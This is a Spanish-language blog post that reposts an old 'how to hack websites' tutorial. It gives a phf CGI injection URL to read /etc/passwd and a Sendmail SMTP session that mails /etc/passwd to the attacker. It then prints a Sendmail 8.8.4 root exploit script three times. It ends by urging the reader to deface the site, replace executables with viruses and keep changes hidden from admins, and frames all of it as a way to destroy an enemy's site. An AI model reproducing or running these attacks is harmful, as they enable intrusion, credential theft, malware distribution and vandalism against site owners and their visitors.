viernes, 15 de julio de 2022

Hack de sitios web

 

CONTENIDOS


1.- Disclaimer


2.- Introduccion


3.- Comenzando el ataque


4.- Obtencion del fichero de Passwd


5.- Usando Exploits



DISCLAIMER 

El contenido de este texto esta solamente destinado a usos educacionales, de investigación y de desarrollo. En ningun momento el creador de este  texto se hace responsable de los daños causados debido a un mal uso de el mismo.


INTRODUCCION 

Si alguna vez se te ha ocurrido que sería divertido cambiar algunas cuantas cosillas de alguna web o de adueñarte de alguna, este texto es para ti. 

Si tu enemigo tiene una web y quieres acabar con ella este texto es para ti.

O si simplemente quieres conocer las posibilidades del hacking este texto es para ti.


COMENZANDO EL ATAQUE 

Lo primero que hay hacer es localizar al servidor victima...

(e.j.)

http://www.victima.com <----------- Victima

Despues recopila la mayor cantidad de informacion sobre el servidor victima por ejemplo su IP, DNS, version de Sendmail, etc.

La mayoria de las veces el servidor que contiene la web-page del site solo tiene unos cuantos logins como el del root y el de algunos cuantos administradores pero para saber cuales y cuantos usuarios, necesitas el fichero de passwd.


OBTENCIÓN DEL FICHERO DE PASSWD

Hay varias formas de entrar, una de ellas seria obteniendo el archivo de passwd pero como? bueno he aqui algunas formas.

Nota para Newbies: Si entras al servidor por ftp con el usuario anonymous y te vas al directorio /etc y te encuentras el fichero passwd no te emociones este fichero solo es basura el fichero correcto esta en:

/home/ftp/etc/passwd <--------- Basura que encuentras si entras por anonymous

/etc/passwd <------------------ Fichero correcto de passwd.

Hay muchas formas de obtener el fichero de passwd como por ejemplo con el phf:

http://www.elsitevictima.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

( 1 )( 2 )( 3 )( 4 )(5)( 6 )


1.- El site que quieras atacar.

2.- El comando phf.

3.- Aqui es donde esta el secreto.

4.- El programa que quieres que se ejecute.

5.- El %20 es un espacio.

6.- Y pues aqui va el archivo o directorio que quieres ver.


O tambien con exploits, este es para obtener el fichero de passwd de servidores con Sendmail con versiones anteriores a la 5.57


% telnet victima.com 25 

Trying 255.255.255.0...

Connected to victima.com 

Escape character is '^]'.

220 victima.com Sendmail 5.55 ready at Sunday, 12 Sept 97 12:09

mail from: "|/bin/mail tudireccion@decorreo.com < /etc/passwd

250 "|/bin/mail tudireccion@decorreo.com < /etc/passwd"... Sender ok

rcpt to: Aqui_pon_lo_que_se_te_antoje.

550 Aqui_pon_lo_que_se_te_antoje.... User unknown

data

354 Enter mail, end with "." on a line by itself

.

250 Mail accepted

quit

Connection closed by foreign host.

%


Despues crackeas el fichero de passwd con cualquier crackeador como el Jack the Ripper o el que acostumbres usar y si sacas alguna de las cuentas telnetea:


%telnet

%o

(to)www.victima.com

Trying 255.255.255.0 ....

Escape character is '^]'.


Linux 2.0.0 (www.victima.com) (tty2)


login:XXXXXXXX

passwd:XXXXXXXX


USANDO EXPLOITS

La forma mas sencilla de hackear una web-page es usando exploits he aqui uno que te hara root en Sendmail 8.8.4.


**************************************************


cat << _EOF_ >/tmp/x.c

#define RUN "/bin/ksh"

#include<stdio.h>

main()

{

execl(RUN,RUN,NULL);

}

_EOF_

#

cat << _EOF_ >/tmp/spawnfish.c

main()

{

execl("/usr/lib/sendmail","/tmp/smtpd",0); 

_EOF_

#

cat << _EOF_ >/tmp/smtpd.c

main()

{

setuid(0); setgid(0); 

system("chown root /tmp/x ;chmod 4755 /tmp/x");

}

_EOF_

#

#

gcc -O -o /tmp/x /tmp/x.c

gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c

gcc -O3 -o /tmp/smtpd /tmp/smtpd.c

#

/tmp/spawnfish

kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// 

|cut -d" " -f1`

rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c

sleep 5

if [ -u /tmp/x ] ; then

echo "leet..."

/tmp/x

fi 


cat << _EOF_ >/tmp/x.c

#define RUN "/bin/ksh"

#include<stdio.h>

main()

{

execl(RUN,RUN,NULL);

}

_EOF_

#

cat << _EOF_ >/tmp/spawnfish.c

main()

{

execl("/usr/lib/sendmail","/tmp/smtpd",0); 

_EOF_

>

#

cat << _EOF_ >/tmp/smtpd.c

main()

{

setuid(0); setgid(0); 

system("chown root /tmp/x ;chmod 4755 /tmp/x");

}

_EOF_

#

#

gcc -O -o /tmp/x /tmp/x.c

gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c

gcc -O3 -o /tmp/smtpd /tmp/smtpd.c

#

/tmp/spawnfish

kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// 

|cut -d" " -f1`

rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c

sleep 5

if [ -u /tmp/x ] ; then

echo "leet..."

/tmp/x

fi 


cat << _EOF_ >/tmp/x.c

#define RUN "/bin/ksh"

#include<stdio.h>

main()

{

execl(RUN,RUN,NULL);

}

_EOF_

#

cat << _EOF_ >/tmp/spawnfish.c

main()

{

execl("/usr/lib/sendmail","/tmp/smtpd",0); 

_EOF_

#

cat << _EOF_ >/tmp/smtpd.c

main()

{

setuid(0); setgid(0); 

system("chown root /tmp/x ;chmod 4755 /tmp/x");

}

_EOF_

#

#

gcc -O -o /tmp/x /tmp/x.c

gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c

gcc -O3 -o /tmp/smtpd /tmp/smtpd.c

#

/tmp/spawnfish

kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// 

|cut -d" " -f1`

rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c

sleep 5

if [ -u /tmp/x ] ; then

echo "leet..."

/tmp/x

fi 


**************************************************

NUNCA HAGAS ESTO ...


Bien ya tengo el root o una cuenta de algun administrador ahora que?, pues ahora sigue la parte mas divertida.

Estando como root bajas todos los archivos de la pagina y despues los  editas cada archivo guardalo con el mismo nombre que tenia para ahorrarte trabajo, luego editas la web-page.

Usa tu imaginzacion por ejemplo si hay archivos executables remplazalos por virus cambia los links modifica las imagenes etc. ahora reemplazas los antiguos archivos por los nuevos recuerda que el chiste es hacer cambios que no llamen mucho la atencion para que los Admins no se den cuenta y dure mas tiempo.


Y recuerda |-|4cK t|-|3 \/\/0r1d ....

No hay comentarios:

Publicar un comentario